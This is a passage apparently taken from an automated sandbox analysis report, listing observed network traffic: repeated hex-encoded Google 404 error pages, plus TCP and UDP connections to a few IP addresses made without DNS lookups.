70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:37 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:38 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:43 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:45 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:46 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:49 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.5.88
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.5.88
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.5.88
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.5.88
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.5.88
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.5.88
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.5.88
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.5.88
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.0
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.1
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.2
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.3
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.4
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.5
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.6
